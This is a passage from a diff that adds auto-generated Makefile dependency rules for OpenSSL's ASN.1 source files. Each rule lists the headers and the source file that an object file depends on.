+a_strex.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+a_strex.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_strex.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+a_strex.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+a_strex.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+a_strex.o: ../../include/openssl/x509_vfy.h ../cryptlib.h a_strex.c charmap.h
+a_strnid.o: ../../e_os.h ../../include/openssl/asn1.h
+a_strnid.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_strnid.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_strnid.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_strnid.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+a_strnid.o: ../../include/openssl/opensslconf.h
+a_strnid.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_strnid.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_strnid.o: ../../include/openssl/symhacks.h ../cryptlib.h a_strnid.c
+a_time.o: ../../e_os.h ../../include/openssl/asn1.h
+a_time.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+a_time.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_time.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_time.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+a_time.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_time.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_time.o: ../../include/openssl/symhacks.h ../cryptlib.h ../o_time.h a_time.c
+a_time.o: asn1_locl.h
+a_type.o: ../../e_os.h ../../include/openssl/asn1.h
+a_type.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+a_type.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_type.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_type.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+a_type.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+a_type.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_type.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_type.o: ../../include/openssl/symhacks.h ../cryptlib.h a_type.c
+a_utctm.o: ../../e_os.h ../../include/openssl/asn1.h
+a_utctm.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_utctm.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_utctm.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_utctm.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_utctm.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_utctm.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_utctm.o: ../cryptlib.h ../o_time.h a_utctm.c asn1_locl.h
+a_utf8.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+a_utf8.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_utf8.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_utf8.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+a_utf8.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_utf8.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_utf8.o: ../../include/openssl/symhacks.h ../cryptlib.h a_utf8.c
+a_verify.o: ../../e_os.h ../../include/openssl/asn1.h
+a_verify.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+a_verify.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_verify.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_verify.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+a_verify.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+a_verify.o: ../../include/openssl/opensslconf.h
+a_verify.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_verify.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+a_verify.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+a_verify.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+a_verify.o: ../../include/openssl/x509_vfy.h ../cryptlib.h a_verify.c
+a_verify.o: asn1_locl.h
+ameth_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+ameth_lib.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+ameth_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+ameth_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ameth_lib.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ameth_lib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ameth_lib.o: ../../include/openssl/opensslconf.h
+ameth_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ameth_lib.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ameth_lib.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ameth_lib.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ameth_lib.o: ../../include/openssl/x509_vfy.h ../cryptlib.h ameth_lib.c
+ameth_lib.o: asn1_locl.h
+asn1_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+asn1_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+asn1_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+asn1_err.o: ../../include/openssl/opensslconf.h
+asn1_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+asn1_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+asn1_err.o: ../../include/openssl/symhacks.h asn1_err.c
+asn1_gen.o: ../../e_os.h ../../include/openssl/asn1.h
+asn1_gen.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+asn1_gen.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+asn1_gen.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+asn1_gen.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+asn1_gen.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+asn1_gen.o: ../../include/openssl/opensslconf.h
+asn1_gen.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+asn1_gen.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+asn1_gen.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+asn1_gen.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+asn1_gen.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+asn1_gen.o: ../cryptlib.h asn1_gen.c
+asn1_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+asn1_lib.o: ../../include/openssl/asn1_mac.h ../../include/openssl/bio.h
+asn1_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+asn1_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+asn1_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+asn1_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+asn1_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+asn1_lib.o: ../../include/openssl/symhacks.h ../cryptlib.h asn1_lib.c
+asn1_par.o: ../../e_os.h ../../include/openssl/asn1.h
+asn1_par.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+asn1_par.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+asn1_par.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+asn1_par.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+asn1_par.o: ../../include/openssl/opensslconf.h
+asn1_par.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+asn1_par.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+asn1_par.o: ../../include/openssl/symhacks.h ../cryptlib.h asn1_par.c
+asn_mime.o: ../../e_os.h ../../include/openssl/asn1.h
+asn_mime.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+asn_mime.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+asn_mime.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+asn_mime.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+asn_mime.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+asn_mime.o: ../../include/openssl/opensslconf.h
+asn_mime.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+asn_mime.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+asn_mime.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+asn_mime.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+asn_mime.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+asn_mime.o: ../cryptlib.h asn1_locl.h asn_mime.c
+asn_moid.o: ../../e_os.h ../../include/openssl/asn1.h
+asn_moid.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+asn_moid.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+asn_moid.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+asn_moid.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+asn_moid.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+asn_moid.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+asn_moid.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+asn_moid.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+asn_moid.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+asn_moid.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+asn_moid.o: ../../include/openssl/x509_vfy.h ../cryptlib.h asn_moid.c
+asn_pack.o: ../../e_os.h ../../include/openssl/asn1.h
+asn_pack.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+asn_pack.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+asn_pack.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+asn_pack.o: ../../include/openssl/opensslconf.h
+asn_pack.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+asn_pack.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+asn_pack.o: ../../include/openssl/symhacks.h ../cryptlib.h asn_pack.c
+bio_asn1.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+bio_asn1.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bio_asn1.o: ../../include/openssl/opensslconf.h
+bio_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_asn1.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_asn1.o: ../../include/openssl/symhacks.h bio_asn1.c
+bio_ndef.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+bio_ndef.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+bio_ndef.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bio_ndef.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bio_ndef.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_ndef.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_ndef.o: ../../include/openssl/symhacks.h bio_ndef.c
+d2i_pr.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+d2i_pr.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+d2i_pr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+d2i_pr.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+d2i_pr.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+d2i_pr.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+d2i_pr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+d2i_pr.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+d2i_pr.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+d2i_pr.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+d2i_pr.o: ../../include/openssl/x509_vfy.h ../cryptlib.h asn1_locl.h d2i_pr.c
+d2i_pu.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+d2i_pu.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+d2i_pu.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+d2i_pu.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+d2i_pu.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+d2i_pu.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+d2i_pu.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+d2i_pu.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rsa.h
+d2i_pu.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+d2i_pu.o: ../../include/openssl/symhacks.h ../cryptlib.h d2i_pu.c
+evp_asn1.o: ../../e_os.h ../../include/openssl/asn1.h
+evp_asn1.o: ../../include/openssl/asn1_mac.h ../../include/openssl/bio.h
+evp_asn1.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+evp_asn1.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+evp_asn1.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+evp_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+evp_asn1.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+evp_asn1.o: ../../include/openssl/symhacks.h ../cryptlib.h evp_asn1.c
+f_enum.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+f_enum.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+f_enum.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+f_enum.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+f_enum.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+f_enum.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+f_enum.o: ../../include/openssl/symhacks.h ../cryptlib.h f_enum.c
+f_int.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+f_int.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+f_int.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+f_int.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+f_int.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+f_int.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+f_int.o: ../../include/openssl/symhacks.h ../cryptlib.h f_int.c
+f_string.o: ../../e_os.h ../../include/openssl/asn1.h
+f_string.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+f_string.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+f_string.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+f_string.o: ../../include/openssl/opensslconf.h
+f_string.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+f_string.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+f_string.o: ../../include/openssl/symhacks.h ../cryptlib.h f_string.c
+i2d_pr.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+i2d_pr.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+i2d_pr.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+i2d_pr.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+i2d_pr.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+i2d_pr.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+i2d_pr.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+i2d_pr.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+i2d_pr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+i2d_pr.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+i2d_pr.o: ../cryptlib.h asn1_locl.h i2d_pr.c
+i2d_pu.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+i2d_pu.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+i2d_pu.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+i2d_pu.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+i2d_pu.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+i2d_pu.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+i2d_pu.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+i2d_pu.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rsa.h
+i2d_pu.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+i2d_pu.o: ../../include/openssl/symhacks.h ../cryptlib.h i2d_pu.c
+n_pkey.o: ../../e_os.h ../../include/openssl/asn1.h
+n_pkey.o: ../../include/openssl/asn1_mac.h ../../include/openssl/asn1t.h
+n_pkey.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+n_pkey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+n_pkey.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+n_pkey.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+n_pkey.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+n_pkey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+n_pkey.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+n_pkey.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+n_pkey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+n_pkey.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+n_pkey.o: ../cryptlib.h n_pkey.c
+nsseq.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+nsseq.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+nsseq.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+nsseq.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+nsseq.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+nsseq.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+nsseq.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+nsseq.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+nsseq.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+nsseq.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h nsseq.c
+p5_pbe.o: ../../e_os.h ../../include/openssl/asn1.h
+p5_pbe.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+p5_pbe.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p5_pbe.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p5_pbe.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p5_pbe.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p5_pbe.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p5_pbe.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+p5_pbe.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+p5_pbe.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p5_pbe.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p5_pbe.o: ../../include/openssl/x509_vfy.h ../cryptlib.h p5_pbe.c
+p5_pbev2.o: ../../e_os.h ../../include/openssl/asn1.h
+p5_pbev2.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+p5_pbev2.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p5_pbev2.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p5_pbev2.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p5_pbev2.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p5_pbev2.o: ../../include/openssl/opensslconf.h
+p5_pbev2.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p5_pbev2.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+p5_pbev2.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p5_pbev2.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p5_pbev2.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p5_pbev2.o: ../cryptlib.h p5_pbev2.c
+p8_pkey.o: ../../e_os.h ../../include/openssl/asn1.h
+p8_pkey.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+p8_pkey.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p8_pkey.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p8_pkey.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p8_pkey.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p8_pkey.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p8_pkey.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+p8_pkey.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p8_pkey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p8_pkey.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p8_pkey.o: ../cryptlib.h p8_pkey.c
+t_bitst.o: ../../e_os.h ../../include/openssl/asn1.h
+t_bitst.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+t_bitst.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+t_bitst.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+t_bitst.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+t_bitst.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+t_bitst.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+t_bitst.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+t_bitst.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+t_bitst.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+t_bitst.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+t_bitst.o: ../../include/openssl/x509v3.h ../cryptlib.h t_bitst.c
+t_crl.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+t_crl.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+t_crl.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+t_crl.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+t_crl.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+t_crl.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+t_crl.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+t_crl.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+t_crl.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+t_crl.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+t_crl.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+t_crl.o: ../../include/openssl/x509v3.h ../cryptlib.h t_crl.c
+t_pkey.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+t_pkey.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+t_pkey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+t_pkey.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+t_pkey.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+t_pkey.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+t_pkey.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+t_pkey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+t_pkey.o: ../cryptlib.h t_pkey.c
+t_req.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+t_req.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+t_req.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+t_req.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+t_req.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+t_req.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+t_req.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+t_req.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+t_req.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+t_req.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+t_req.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+t_req.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+t_req.o: ../../include/openssl/x509v3.h ../cryptlib.h t_req.c
+t_spki.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+t_spki.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+t_spki.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+t_spki.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+t_spki.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+t_spki.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+t_spki.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+t_spki.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+t_spki.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+t_spki.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+t_spki.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+t_spki.o: ../../include/openssl/x509_vfy.h ../cryptlib.h t_spki.c
+t_x509.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+t_x509.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+t_x509.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+t_x509.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+t_x509.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+t_x509.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+t_x509.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+t_x509.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+t_x509.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+t_x509.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+t_x509.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+t_x509.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+t_x509.o: ../../include/openssl/x509v3.h ../cryptlib.h asn1_locl.h t_x509.c
+t_x509a.o: ../../e_os.h ../../include/openssl/asn1.h
+t_x509a.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+t_x509a.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+t_x509a.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+t_x509a.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+t_x509a.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+t_x509a.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+t_x509a.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+t_x509a.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+t_x509a.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+t_x509a.o: ../../include/openssl/x509_vfy.h ../cryptlib.h t_x509a.c
+tasn_dec.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+tasn_dec.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tasn_dec.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tasn_dec.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+tasn_dec.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+tasn_dec.o: ../../include/openssl/opensslconf.h
+tasn_dec.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_dec.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+tasn_dec.o: ../../include/openssl/symhacks.h tasn_dec.c
+tasn_enc.o: ../../e_os.h ../../include/openssl/asn1.h
+tasn_enc.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+tasn_enc.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+tasn_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+tasn_enc.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tasn_enc.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tasn_enc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_enc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+tasn_enc.o: ../../include/openssl/symhacks.h ../cryptlib.h tasn_enc.c
+tasn_fre.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+tasn_fre.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+tasn_fre.o: ../../include/openssl/e_os2.h ../../include/openssl/obj_mac.h
+tasn_fre.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tasn_fre.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_fre.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
